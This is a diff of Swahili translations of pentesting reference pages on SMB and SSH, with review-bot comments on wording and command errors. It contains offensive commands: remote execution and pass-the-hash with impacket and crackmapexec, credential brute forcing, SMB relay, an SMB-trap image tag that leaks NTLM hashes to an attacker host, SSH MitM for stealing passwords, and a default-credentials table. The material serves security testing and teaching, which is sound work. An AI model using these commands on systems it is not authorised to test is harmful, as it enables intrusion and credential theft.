| `enable privileges = yes` | Kuheshimu vibali vilivyotolewa kwa SID maalum? |
| `create mask = 0777` | Ni ruhusa gani inapaswa kutolewa kwa faili mpya zinazoundwa? |
| `directory mask = 0777` | Ni ruhusa gani inapaswa kutolewa kwa saraka mpya? |
| `logon script = script.sh` | Ni script gani inapaswa kutekelezwa wakati wa kuingia kwa mtumiaji? |
| `magic script = script.sh` | Script gani inapaswa kutekelezwa script inapofungwa? |
| `magic output = script.out` | Wapi matokeo ya magic script yanapaswa kuhifadhiwa? |
| `browseable = yes` | Kuruhusu kuorodhesha shares zinazopatikana kwenye share ya sasa? |
| `read only = no` | Kuzuia uundaji na uhariri wa mafaili? |
| `writable = yes` | Kuruhusu watumiaji kuunda na kuhariri mafaili? |
| `guest ok = yes` | Kuruhusu kuunganishwa kwa huduma bila kutumia nenosiri? |
| `enable privileges = yes` | Kuheshimu vibali vilivyotangazwa kwa SID maalum? |
| `create mask = 0777` | Ni ruhusa gani zinapaswa kutolewa kwa mafaili yaliyoundwa hivi karibuni? |
| `directory mask = 0777` | Ni ruhusa gani zinapaswa kutolewa kwa directory mpya zilizoundwa? |
| `logon script = script.sh` | Ni script gani inahitaji kutekelezwa wakati wa kuingia kwa mtumiaji? |
| `magic script = script.sh` | Ni script gani inapaswa kutekelezwa wakati script inapofungwa? |
| `magic output = script.out` | Wapi pato la magic script linapaswa kuhifadhiwa? |
Amri `smbstatus` inatoa taarifa kuhusu **seva** na kuhusu **nani ameunganishwa**.
## Thibitisha kwa kutumia Kerberos
## Thibitisha kwa kutumia kerberos
Unaweza **kuthibitisha** kwa **Kerberos** ukitumia zana **smbclient** na **rpcclient**:
Unaweza **kuthibitisha** kwa **kerberos** ukitumia zana **smbclient** na **rpcclient**:
```bash
smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com
```
## **Endesha Amri**
In mazingira ya Kerberos pekee (NTLM imezimwa), jaribio za NTLM dhidi ya SMB zinaweza kurudisha `STATUS_NOT_SUPPORTED`. Rekebisha matatizo ya kawaida ya Kerberos na lazimisha uthibitishaji wa Kerberos:
```bash
# sync clock to avoid KRB_AP_ERR_SKEW
sudo ntpdate <dc.fqdn>
# use Kerberos with tooling (reads your TGT from ccache)
netexec smb <dc.fqdn> -k
```
Kwa ajili ya usanidi kamili wa mteja (krb5.conf generation, kinit, SSH GSSAPI/SPN caveats) angalia:
{{#ref}}
../pentesting-kerberos-88/README.md
{{#endref}}
## **Tekeleza Amri**
### **crackmapexec**
crackmapexec inaweza kutekeleza amri kwa **kutumia** mojawapo ya **mmcexec, smbexec, atexec, wmiexec**, ambapo **wmiexec** ndiyo njia ya **chaguo-msingi**. Unaweza kubainisha ni chaguo gani unazopendelea kutumia kwa kipengeo `--exec-method`:
crackmapexec inaweza kutekeleza amri **kutumia** yoyote ya **mmcexec, smbexec, atexec, wmiexec**, ambapo **wmiexec** ni njia ya **chaguo-msingi**. Unaweza kubainisha chaguo unachopendelea kutumia kwa parameter `--exec-method`:
```bash
apt-get install crackmapexec
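Review bot: the new paragraph "In mazingira ya Kerberos pekee..." starts with English "In" instead of "Katika", and the smb.conf table header is reverted from "**Mipangilio** | **Maelezo**" to "**Setting** | **Description**". In the new code block, `netexec smb <dc.fqdn> -k` is commented as reading the TGT from the ccache, but `-k` only selects Kerberos; the NetExec option for authenticating from `KRB5CCNAME` is `--use-kcache`, so the command or its comment should say so.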
@ -381,9 +393,9 @@ crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash
```
### [**psexec**](../../windows-hardening/lateral-movement/psexec-and-winexec.md)**/**[**smbexec**](../../windows-hardening/lateral-movement/smbexec.md)
Chaguzi zote mbili zitaunda **service mpya** (kwa kutumia _\pipe\svcctl_ kupitia SMB) kwenye mashine ya mwathiri na kuitumia **kutekeleza kitu** (**psexec** itafanya **upload** faili inayotekelezeka kwenye ADMIN$ share na **smbexec** itaelekeza kwa **cmd.exe/powershell.exe** na kuweka kwenye arguments payload --**file-less technique-**-).\
**Taarifa zaidi** kuhusu [**psexec** ](../../windows-hardening/lateral-movement/psexec-and-winexec.md)na [**smbexec**](../../windows-hardening/lateral-movement/smbexec.md).\
Katika **kali** iko kwenye /usr/share/doc/python3-impacket/examples/
Zote mbili zitaunda **huduma mpya** (kwa kutumia _\pipe\svcctl_ kupitia SMB) kwenye mashine ya mwathirika na kuitumia **kutekeleza kitu** (**psexec** itafanya **upload** faili ya executable kwenye share ya ADMIN$ na **smbexec** itaelekeza kwa **cmd.exe/powershell.exe** na kuweka katika arguments payload --**file-less technique-**-).\
**Taarifa zaidi** kuhusu [**psexec** ](../../windows-hardening/lateral-movement/psexec-and-winexec.md)and [**smbexec**](../../windows-hardening/lateral-movement/smbexec.md).\
Kwenye **kali** iko kwenye /usr/share/doc/python3-impacket/examples/
```bash
#If no password is provided, it will be prompted
./psexec.py [[domain/]username[:password]@]<targetName or address>
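Review bot: "**Taarifa zaidi** kuhusu [**psexec**] and [**smbexec**]" switches the connective back to English; the old line had "na". While here, the `--**file-less technique-**-` markup is garbled in both versions (stray hyphens inside the bold span) and could be written as "(**file-less technique**)".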
@ -391,19 +403,19 @@ Katika **kali** iko kwenye /usr/share/doc/python3-impacket/examples/
psexec \\192.168.122.66 -u Administrator -p 123456Ww
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash
```
Kutumia **parameter**`-k` unaweza authenticate dhidi ya **kerberos** badala ya **NTLM**
Kwa kutumia **parameter**`-k` unaweza kuthibitisha kwa **kerberos** badala ya **NTLM**
### [wmiexec](../../windows-hardening/lateral-movement/wmiexec.md)/dcomexec
Endesha kwa siri shell ya amri bila kugusa diski au kuendesha huduma mpya ukitumia DCOM kupitia **port 135.**\
Katika **kali** inapatikana kwenye /usr/share/doc/python3-impacket/examples/
Fanya kwa kificho utekelezaji wa shell ya amri bila kugusa diski au kuanzisha huduma mpya ukitumia DCOM kupitia **port 135.**\
Katika **kali** iko kwenye /usr/share/doc/python3-impacket/examples/
```bash
#If no password is provided, it will be prompted
./wmiexec.py [[domain/]username[:password]@]<targetName or address> #Prompt for password
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
```
Kwa kutumia **kigezo**`-k` unaweza kuthibitisha kwa **kerberos** badala ya **NTLM**
Kutumia **kigezo**`-k` unaweza kuthibitisha kwa **kerberos** badala ya **NTLM**
```bash
#If no password is provided, it will be prompted
./dcomexec.py [[domain/]username[:password]@]<targetName or address>
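Review bot: The two identical `-k` sentences are rewritten in opposite directions: the psexec one changes "Kutumia **parameter**`-k`" to "Kwa kutumia **parameter**`-k`", while the wmiexec one changes "Kwa kutumia **kigezo**`-k`" to "Kutumia **kigezo**`-k`". Pick one phrasing and one term ("parameter" vs "kigezo") and use it for both. In the wmiexec intro, "Fanya kwa kificho utekelezaji wa shell ya amri" reads awkwardly compared with the replaced "Endesha kwa siri shell ya amri"; the old wording was clearer.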
@ -412,7 +424,7 @@ Kwa kutumia **kigezo**`-k` unaweza kuthibitisha kwa **kerberos** badala ya **NTL
```
### [AtExec](../../windows-hardening/lateral-movement/atexec.md)
Tekeleza amri kupitia Task Scheduler (ukitumia _\pipe\atsvc_ kupitia SMB).\
Endesha amri kupitia Task Scheduler (ukitumia _\pipe\atsvc_ kupitia SMB).\
Katika **kali** iko kwenye /usr/share/doc/python3-impacket/examples/
```bash
./atexec.py [[domain/]username[:password]@]<targetName or address> "command"
@ -422,36 +434,36 @@ Katika **kali** iko kwenye /usr/share/doc/python3-impacket/examples/
[https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/)
### ksmbd eneo la mashambulizi na SMB2/SMB3 protocol fuzzing (syzkaller)
### Uso wa mashambulizi wa ksmbd na fuzzing ya protocol ya SMB2/SMB3 (syzkaller)
{{#ref}}
ksmbd-attack-surface-and-fuzzing-syzkaller.md
{{#endref}}
## **Bruteforce watumiaji credentials**
## **Bruteforce credentials za watumiaji**
**Hii haipendekezwi — unaweza kuzuia akaunti ikiwa utazidi idadi ya jaribio zinazoruhusiwa**
**Hii haipendekezwi, unaweza kuzuia akaunti ikiwa utaizidi idadi ya majaribio iliyoruhusiwa**
```bash
nmap --script smb-brute -p 445 <IP>
ridenum.py <IP> 500 50000 /root/passwds.txt #Get usernames bruteforcing that rids and then try to bruteforce each user name
```
## SMB relay attack
Shambulio hili linatumia Responder toolkit kunasa **kikao za uthibitishaji za SMB** kwenye mtandao wa ndani, na **kuzirusha** kwa **mashine lengwa**. Ikiwa **kikao cha uthibitishaji kimefanikiwa**, kitatupa moja kwa moja kwenye **system** **shell**.\
Shambulio hili linatumia Responder toolkit ili **capture SMB authentication sessions** kwenye mtandao wa ndani, na **relays** kwa **target machine**. Ikiwa authentication **session** itafanyika kwa mafanikio, itakuingiza moja kwa moja ndani ya **system** **shell**.\
[**More information about this attack here.**](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
## SMB-Trap
Maktaba ya Windows URLMon.dll hujaribu kwa otomatiki kuthibitisha kwa mwenyeji wakati ukurasa unapotaka kufikia baadhi ya yaliyomo kupitia SMB, kwa mfano: `img src="\\10.10.10.10\path\image.jpg"`
Maktaba ya Windows URLMon.dll hujaribu kwa otomatiki authenticate kwa host wakati ukurasa unajaribu kufikia baadhi ya content kupitia SMB, kwa mfano: `img src="\\10.10.10.10\path\image.jpg"`
Hii hutokea kwa functions zifuatazo:
Hii hutokea na functions zifuatazo:
- URLDownloadToFile
- URLDownloadToCache
- URLOpenStream
- URLOpenBlockingStream
Ambazo hutumika na baadhi ya browsers na tools (like Skype)
Ambazo zinatumiwa na baadhi ya browsers na tools (kama Skype)
![From: http://www.elladodelmal.com/2017/02/como-hacer-ataques-smbtrap-windows-con.html](<../../images/image (358).png>)
@ -461,11 +473,11 @@ Ambazo hutumika na baadhi ya browsers na tools (like Skype)
## NTLM Theft
Sawa na SMB Trapping, kuweka faili zenye madhara kwenye mfumo lengwa (kwa mfano kupitia SMB) kunaweza kusababisha jaribio la uthibitishaji la SMB, na kuruhusu hash ya NetNTLMv2 kunaswa kwa kutumia zana kama Responder. Hash hiyo inaweza kisha kuvunjwa offline au kutumika katika [SMB relay attack](#smb-relay-attack).
Similar to SMB Trapping, kuweka faili zenye madhara kwenye target system (kupitia SMB, kwa mfano) kunaweza kusababisha jaribio la SMB authentication, kuruhusu NetNTLMv2 hash kukamatwa na tool kama Responder. Hash inaweza kisha ku crack offline au kutumika katika an [SMB relay attack](#smb-relay-attack).
[See: ntlm_theft](../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md#ntlm_theft)
## HackTricks Amri za Otomatiki
## HackTricks Automatic Commands
```
Protocol_Name: SMB #Protocol Abbreviation if there is one.
Port_Number: 137,138,139 #Comma separated if there is more than one.
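Review bot: Several rewritten sentences in this region regress from Swahili to untranslated English. The SMB relay paragraph now reads "ili **capture SMB authentication sessions** ... na **relays** kwa **target machine**", where the replaced line had full Swahili ("kunasa **kikao za uthibitishaji za SMB** ... **kuzirusha** kwa **mashine lengwa**"); the NTLM Theft paragraph now opens with "Similar to SMB Trapping" and contains "katika an [SMB relay attack]"; and the heading "## HackTricks Amri za Otomatiki" is reverted to "## HackTricks Automatic Commands". Keep the Swahili versions (or translate the English fragments) so the page stays in one language.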
@ -498,8 +510,8 @@ getArch.py -target {IP}
With Creds
smbmap -H {IP} -u {Username} -p {Password}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP}
smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
smbclient "\\\\{IP}\\" -U {Username} -W {Domain_Name} -l {IP}
smbclient "\\\\{IP}\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`
crackmapexec smb {IP} -u {Username} -p {Password} --shares
GetADUsers.py {Domain_Name}/{Username}:{Password} -all
GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat
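Review bot: The quoting fix is correct: the old lines ended in `"\\\\{IP}\\\"`, where the final `\"` escapes the closing double quote and leaves the shell string unterminated, and the new `"\\\\{IP}\\"` terminates properly. Two things still worth checking on the same lines: the resulting target `\\{IP}\` carries no share name, and `-l {IP}` is smbclient's log-basename option, while listing shares is done with `-L`; confirm which was intended before the command is copied further.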
@ -534,4 +546,10 @@ Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'
```
## Marejeo
- [NetExec (CME) wiki Kerberos usage](https://www.netexec.wiki/)
- [Pentesting Kerberos (88) client setup and troubleshooting](../pentesting-kerberos-88/README.md)
- [0xdf HTB: TheFrizz](https://0xdf.gitlab.io/2025/08/23/htb-thefrizz.html)
{{#include ../../banners/hacktricks-training.md}}
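Review bot: The first entry of the new "## Marejeo" list, "[NetExec (CME) wiki Kerberos usage](https://www.netexec.wiki/)", points at the wiki root rather than a Kerberos-specific page; link the actual section the `-k` examples on this page rely on, or drop "Kerberos usage" from the link text. The relative link "../pentesting-kerberos-88/README.md" is fine for a sibling directory under network-services-pentesting, but note the rest of this file links with "../../", so double-check it resolves in the built site.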
@ -2,27 +2,27 @@
{{#include ../banners/hacktricks-training.md}}
## Basic Information
## Taarifa za Msingi
**SSH (Secure Shell au Secure Socket Shell)** ni protokali ya mtandao inayowezesha muunganisho salama kwa kompyuta kupitia mtandao usio salama. Ni muhimu kwa kudumisha usiri na uadilifu wa data unapofikia mifumo ya mbali.
**SSH (Secure Shell or Secure Socket Shell)** ni itifaki ya mtandao inayowezesha muunganisho salama kwa kompyuta kupitia mtandao usio salama. Ni muhimu kwa kudumisha usiri na uadilifu wa data unapoingia kwenye mifumo ya mbali.
**Bandari ya kawaida:** 22
**Bandari ya chaguo-msingi:** 22
```
22/tcp open ssh syn-ack
```
**SSH servers:**
**Seva za SSH:**
- [openSSH](http://www.openssh.org) OpenBSD SSH, iliyotolewa katika BSD, usambazaji wa Linux na Windows tangu Windows 10
- [Dropbear](https://matt.ucc.asn.au/dropbear/dropbear.html) utekelezaji wa SSH kwa mazingira yenye kumbukumbu na rasilimali za processor za chini, iliyotolewa katika OpenWrt
- [PuTTY](https://www.chiark.greenend.org.uk/~sgtatham/putty/) utekelezaji wa SSH kwa Windows, mteja hutumiwa mara nyingi lakini matumizi ya seva ni nadra
- [openSSH](http://www.openssh.org) OpenBSD SSH, inayopatikana katika BSD, distributions za Linux na Windows tangu Windows 10
- [Dropbear](https://matt.ucc.asn.au/dropbear/dropbear.html) Utekelezaji wa SSH kwa mazingira yenye kumbukumbu ndogo na rasilimali za prosesa, hutolewa katika OpenWrt
- [PuTTY](https://www.chiark.greenend.org.uk/~sgtatham/putty/) Utekelezaji wa SSH kwa Windows; mteja hutumika sana lakini matumizi ya seva ni nadra
- [CopSSH](https://www.itefix.net/copssh) utekelezaji wa OpenSSH kwa Windows
**SSH libraries (implementing server-side):**
**Maktaba za SSH (kutekeleza upande wa seva):**
- [libssh](https://www.libssh.org) maktaba ya C ya majukwaa mengi inayotekeleza protokali ya SSHv2 ikiwa na viambatisho katika [Python](https://github.com/ParallelSSH/ssh-python), [Perl](https://github.com/garnier-quentin/perl-libssh/) na [R](https://github.com/ropensci/ssh); inatumika na KDE kwa sftp na na GitHub kwa miundombinu ya git SSH
- [wolfSSH](https://www.wolfssl.com/products/wolfssh/) maktaba ya seva ya SSHv2 iliyoandikwa kwa ANSI C na iliyolengwa kwa mazingira yaliyo na rasilimali chache, RTOS, na zilizozuiliwa
- [Apache MINA SSHD](https://mina.apache.org/sshd-project/index.html) maktaba ya Apache SSHD ya java inategemea Apache MINA
- [paramiko](https://github.com/paramiko/paramiko) maktaba ya protokali ya Python SSHv2
- [libssh](https://www.libssh.org) maktaba ya C ya multiplatform inayotekeleza protocol ya SSHv2 na bindings katika [Python](https://github.com/ParallelSSH/ssh-python), [Perl](https://github.com/garnier-quentin/perl-libssh/) na [R](https://github.com/ropensci/ssh); inatumika na KDE kwa sftp na pia na GitHub kwa miundombinu ya git SSH
- [wolfSSH](https://www.wolfssl.com/products/wolfssh/) maktaba ya seva ya SSHv2 iliyoandikwa kwa ANSI C na iliyolengwa kwa vifaa vya embedded, RTOS, na mazingira yenye rasilimali ndogo
- [Apache MINA SSHD](https://mina.apache.org/sshd-project/index.html) maktaba ya Apache SSHD ya Java inategemea Apache MINA
- [paramiko](https://github.com/paramiko/paramiko) maktaba ya Python ya protocol ya SSHv2
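Review bot: "**SSH (Secure Shell or Secure Socket Shell)** ni itifaki ya mtandao" keeps the English "or" inside the bold term, while the replaced line had "au"; restore "au". Terminology is also inconsistent within this region: the intro uses "itifaki" for protocol, but the libssh and paramiko entries use "protocol ya SSHv2" and the replaced lines used "protokali"; settle on one term for the whole file.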
## Enumeration
@ -30,25 +30,25 @@
```bash
nc -vn <IP> 22
```
### Automated ssh-audit
### Otomatiki ssh-audit
ssh-audit ni chombo cha ukaguzi wa usanidi wa ssh server na mteja.
ssh-audit ni chombo cha ukaguzi wa usanidi wa seva na mteja wa SSH.
[https://github.com/jtesta/ssh-audit](https://github.com/jtesta/ssh-audit) ni toleo lililosasishwa kutoka [https://github.com/arthepsy/ssh-audit/](https://github.com/arthepsy/ssh-audit/)
[https://github.com/jtesta/ssh-audit](https://github.com/jtesta/ssh-audit) ni fork iliyosasishwa kutoka [https://github.com/arthepsy/ssh-audit/](https://github.com/arthepsy/ssh-audit/)
**Features:**
**Vipengele:**
- Msaada wa protokali za SSH1 na SSH2;
- changanua usanidi wa mteja wa SSH;
- pata banner, tambua kifaa au programu na mfumo wa uendeshaji, gundua compression;
- kusanya funguo za kubadilishana, funguo za mwenyeji, algorithms za encryption na code za uthibitishaji wa ujumbe;
- toa taarifa za algorithm (zinapatikana tangu, zimetolewa/kuzima, zisizo salama/dhaifu/mzee, nk);
- toa mapendekezo ya algorithm (ongeza au ondoa kulingana na toleo la programu lililotambuliwa);
- toa taarifa za usalama (masuala yanayohusiana, orodha ya CVE iliyotolewa, nk);
- changanua ulinganifu wa toleo la SSH kulingana na taarifa za algorithm;
- Msaada wa seva kwa itifaki za SSH1 na SSH2;
- kuchambua usanidi wa mteja wa SSH;
- kupata banner, kutambua kifaa au programu na mfumo wa uendeshaji, kugundua compression;
- kusanya key-exchange, host-key, encryption na message authentication code algoritimu;
- tolea taarifa za algoritimu (inapatikana tangu, imeondolewa/imezimwa, hatari/dhaifu/ya zamani, n.k.);
- tolea mapendekezo ya algoritimu (ongeza au ondoa kulingana na toleo la programu lililotambuliwa);
- tolea taarifa za usalama (masuala yanayohusiana, orodha ya CVE zilizotolewa, n.k.);
- kuchambua utangamano wa toleo la SSH kulingana na taarifa za algoritimu;
- taarifa za kihistoria kutoka OpenSSH, Dropbear SSH na libssh;
- inafanya kazi kwenye Linux na Windows;
- haina utegemezi
- hakuna utegemezi
```bash
usage: ssh-audit.py [-1246pbcnjvlt] <host>
@ -69,17 +69,17 @@ use -t to change timeout)
(default: 5)
$ python3 ssh-audit <IP>
```
[See it in action (Asciinema)](https://asciinema.org/a/96ejZKxpbuupTK9j7h8BdClzp)
[Tazama inavyofanya kazi (Asciinema)](https://asciinema.org/a/96ejZKxpbuupTK9j7h8BdClzp)
### Funguo za SSH za umma za seva
### Ufunguo wa umma wa SSH wa server
```bash
ssh-keyscan -t rsa <IP> -p <PORT>
```
### Algorithimu za Cipher Zenye Ukatili
### Algoritimu dhaifu za cipher
Hii inagundulika kwa default na **nmap**. Lakini unaweza pia kutumia **sslcan** au **sslyze**.
Hii inagunduliwa kwa chaguo-msingi na **nmap**. Lakini unaweza pia kutumia **sslcan** au **sslyze**.
### Skripti za Nmap
### Scripts za Nmap
```bash
nmap -p22 <ip> -sC # Send default nmap scripts for SSH
nmap -p22 <ip> -sV # Retrieve version
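Review bot: "**sslcan**" in "unaweza pia kutumia **sslcan** au **sslyze**" is a typo carried over unchanged from the old line; the tool is **sslscan**. Since this sentence is being rewritten anyway, fix the name here.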
@ -95,27 +95,28 @@ nmap -p22 <ip> --script ssh-auth-methods --script-args="ssh.user=root" # Check a
### Username Enumeration
Katika toleo fulani la OpenSSH unaweza kufanya shambulio la muda ili kuhesabu watumiaji. Unaweza kutumia moduli ya metasploit ili kutumia hii:
Katika baadhi ya matoleo ya OpenSSH unaweza kufanya timing attack ili enumerate users. Unaweza kutumia metasploit module ili ku-exploit hili:
```
msf> use scanner/ssh/ssh_enumusers
```
### [Brute force](../generic-hacking/brute-force.md#ssh)
Baadhi ya akisi za kawaida za ssh [hapa](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt) na [hapa](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt) na chini.
Baadhi ya ssh credentials zifuatazo ziko [here ](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt)and [here](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt) na hapa chini.
### Private Key Brute Force
Ikiwa unajua baadhi ya funguo za kibinafsi za ssh ambazo zinaweza kutumika... hebu jaribu. Unaweza kutumia skripti ya nmap:
Ikiwa unajua baadhi ya ssh private keys ambazo zinaweza kutumika... tujaribu. Unaweza kutumia nmap script:
```
https://nmap.org/nsedoc/scripts/ssh-publickey-acceptance.html
```
Au moduli wa msaada wa MSF:
Au MSF auxiliary module:
```
msf> use scanner/ssh/ssh_identify_pubkeys
```
Or use `ssh-keybrute.py` (native python3, lightweight and has legacy algorithms enabled): [snowdroppe/ssh-keybrute](https://github.com/snowdroppe/ssh-keybrute).
Au tumia `ssh-keybrute.py` (inaendeshwa na python3, nyepesi na ina legacy algorithms zimeshwezeshwa): [snowdroppe/ssh-keybrute](https://github.com/snowdroppe/ssh-keybrute).
#### badkeys zilizojulikana zinaweza kupatikana hapa:
#### Known badkeys can be found here:
{{#ref}}
https://github.com/rapid7/ssh-badkeys/tree/master/authorized
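Review bot: Several new lines here are harder to read than the ones they replace. "unaweza kufanya timing attack ili enumerate users" drops the verb prefix (at minimum "ili ku-enumerate", better the earlier "ili kuhesabu watumiaji"); "ziko [here ](...)and [here](...) na hapa chini" reintroduces untranslated "here"/"and" with a stray space in the link text where the old line had "[hapa]... na [hapa]"; "zimeshwezeshwa" is a typo for "zimewezeshwa"; and "#### badkeys zilizojulikana zinaweza kupatikana hapa:" is reverted to the English "#### Known badkeys can be found here:". Keep the Swahili forms and fix the typo.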
@ -123,22 +124,41 @@ https://github.com/rapid7/ssh-badkeys/tree/master/authorized
#### Weak SSH keys / Debian predictable PRNG
Baadhi ya mifumo yana kasoro zinazojulikana katika mbegu ya nasibu inayotumika kuunda vifaa vya kificho. Hii inaweza kusababisha kupungua kwa kiwango cha funguo ambacho kinaweza kufanywa kwa nguvu. Seti za funguo zilizoundwa awali kwenye mifumo ya Debian iliyoathiriwa na PRNG dhaifu zinapatikana hapa: [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh).
Baadhi ya mifumo zina dosari zilizo wazi kwenye random seed inayotumika kuzalisha cryptographic material. Hii inaweza kusababisha keyspace iliyopunguzwa kwa kiasi kikubwa ambayo inaweza kufunguliwa kwa bruteforce. Seti zilizotayarishwa awali za keys zilizozalishwa kwenye Debian systems zilizoathiriwa na weak PRNG zinapatikana hapa: [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh).
Unapaswa kutazama hapa ili kutafuta funguo halali za mashine ya mwathirika.
Unapaswa kuangalia hapa ili kutafuta keys halali za mashine ya mwathiriwa.
### Kerberos
### Kerberos / GSSAPI SSO
**crackmapexec** kutumia itifaki ya `ssh` inaweza kutumia chaguo `--kerberos` ili **kujiandikisha kupitia kerberos**.\
Kwa maelezo zaidi, endesha `crackmapexec ssh --help`.
If the target SSH server supports GSSAPI (for example Windows OpenSSH on a domain controller), you can authenticate using your Kerberos TGT instead of a password.
## Default Credentials
Mtiririko wa kazi kutoka kwenye mwenyeji wa mshambuliaji wa Linux:
```bash
# 1) Ensure time is in sync with the KDC to avoid KRB_AP_ERR_SKEW
sudo ntpdate <dc.fqdn>
# 2) Generate a krb5.conf for the target realm (optional, but handy)
netexec smb <dc.fqdn> -u <user> -p '<pass>' -k --generate-krb5-file krb5.conf
sudo cp krb5.conf /etc/krb5.conf
# 3) Obtain a TGT for the user
kinit <user>
klist
# 4) SSH with GSSAPI, using the FQDN that matches the host SPN
ssh -o GSSAPIAuthentication=yes <user>@<host.fqdn>
```
Notes:
- Ikiwa unajiunga kwa jina lisilo sahihi (kwa mfano, short host, alias, au mpangilio usio sahihi katika `/etc/hosts`), unaweza kupata: "Server not found in Kerberos database" kwa sababu SPN haitalingana.
- `crackmapexec ssh --kerberos` pia inaweza kutumia ccache yako kwa Kerberos auth.
## Nenosiri za Chaguo-msingi
| **Vendor** | **Usernames** | **Passwords** |
| ---------- | ----------------------------------------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| APC | apc, device | apc |
| Brocade | admin | admin123, password, brocade, fibranne |
| Cisco | admin, cisco, enable, hsa, pix, pnadmin, ripeop, root, shelladmin | admin, Admin123, default, password, secur4u, cisco, Cisco, \_Cisco, cisco123, C1sco!23, Cisco123, Cisco1234, TANDBERG, change_it, 12345, ipics, pnadmin, diamond, hsadb, c, cc, attack, blender, changeme |
| Cisco | admin, cisco, enable, hsa, pix, pnadmin, ripeop, root, shelladmin | admin, Admin123, default, password, secur4u, cisco, Cisco, _Cisco, cisco123, C1sco!23, Cisco123, Cisco1234, TANDBERG, change_it, 12345, ipics, pnadmin, diamond, hsadb, c, cc, attack, blender, changeme |
| Citrix | root, nsroot, nsmaint, vdiadmin, kvm, cli, admin | C1trix321, nsroot, nsmaint, kaviza, kaviza123, freebsd, public, rootadmin, wanscaler |
| D-Link | admin, user | private, admin, user |
| Dell | root, user1, admin, vkernel, cli | calvin, 123456, password, vkernel, Stor@ge!, admin |
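Review bot: The new GSSAPI subsection is only partly translated: "If the target SSH server supports GSSAPI (for example Windows OpenSSH on a domain controller), you can authenticate using your Kerberos TGT instead of a password." and the "Notes:" label remain in English while the surrounding lines ("Mtiririko wa kazi kutoka kwenye mwenyeji wa mshambuliaji wa Linux:", the bullet about "Server not found in Kerberos database") are Swahili. In the Debian PRNG paragraph, "dosari zilizo wazi" ("open flaws") mistranslates the earlier "kasoro zinazojulikana" ("known flaws"), and "mwathiriwa" should match the "mwathirika" used elsewhere in this file. Finally, the Cisco table row drops the markdown escape, changing "\_Cisco" to "_Cisco"; the unescaped underscore renders correctly in CommonMark but keeping the backslash is safer across renderers and was not part of the translation.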
@ -153,43 +173,43 @@ Kwa maelezo zaidi, endesha `crackmapexec ssh --help`.
## SSH-MitM
Ikiwa uko kwenye mtandao wa ndani kama mwathirika ambaye atajiunga na seva ya SSH kwa kutumia jina la mtumiaji na nenosiri, unaweza kujaribu **kufanya shambulio la MitM ili kuiba akreditivu hizo:**
Ikiwa uko kwenye mtandao wa ndani na ni mwathirika ambaye anataka kuungana na server ya SSH kwa kutumia username na password unaweza kujaribu **kufanya shambulio la MitM ili kuiba taarifa hizo za kuingia:**
**Njia ya shambulio:**
- **Uelekezaji wa Trafiki:** Mshambuliaji **anahamisha** trafiki ya mwathirika kwenye mashine yao, kwa ufanisi **akikamata** jaribio la kuungana na seva ya SSH.
- **Kukamata na Kurekodi:** Mashine ya mshambuliaji inafanya kazi kama **proxy**, **ikikamata** maelezo ya kuingia ya mtumiaji kwa kujifanya kuwa seva halali ya SSH.
- **Utendaji wa Amri na Uhamasishaji:** Hatimaye, seva ya mshambuliaji **inakumbuka akreditivu za mtumiaji**, **inasambaza amri** kwa seva halisi ya SSH, **inafanya** hizo, na **inatuma matokeo nyuma** kwa mtumiaji, ikifanya mchakato huo kuonekana kuwa wa kawaida na halali.
- **Traffic Redirection:** Mshambuliaji **huielekeza** trafiki ya mwathirika kwenye mashine yao, kwa hivyo kwa ufanisi **huchukua** jaribio la kuunganishwa na server ya SSH.
- **Interception and Logging:** Mashine ya mshambuliaji inafanya kazi kama **proxy**, ikiwa **inakamata** maelezo ya kuingia ya mtumiaji kwa kujifanya kuwa server halali ya SSH.
- **Command Execution and Relay:** Hatimaye, server ya mshambuliaji **inarekodi nywila za mtumiaji**, **inatuma amri** kwa server halisi ya SSH, **inaziendesha**, na **inarejesha matokeo** kwa mtumiaji, na kufanya mchakato uonekane laini na halali.
[**SSH MITM**](https://github.com/jtesta/ssh-mitm) inafanya hasa kile kilichoelezwa hapo juu.
[**SSH MITM**](https://github.com/jtesta/ssh-mitm) inafanya kabisa kile kilichoelezwa hapo juu.
Ili kukamata kufanya MitM halisi unaweza kutumia mbinu kama ARP spoofing, DNS spoofing au nyingine zilizoelezwa katika [**Network Spoofing attacks**](../generic-methodologies-and-resources/pentesting-network/index.html#spoofing).
Ili kutekeleza MitM halisi unaweza kutumia mbinu kama ARP spoofing, DNS spoofin au nyingine zilizoelezewa katika [**Network Spoofing attacks**](../generic-methodologies-and-resources/pentesting-network/index.html#spoofing).
## SSH-Snake
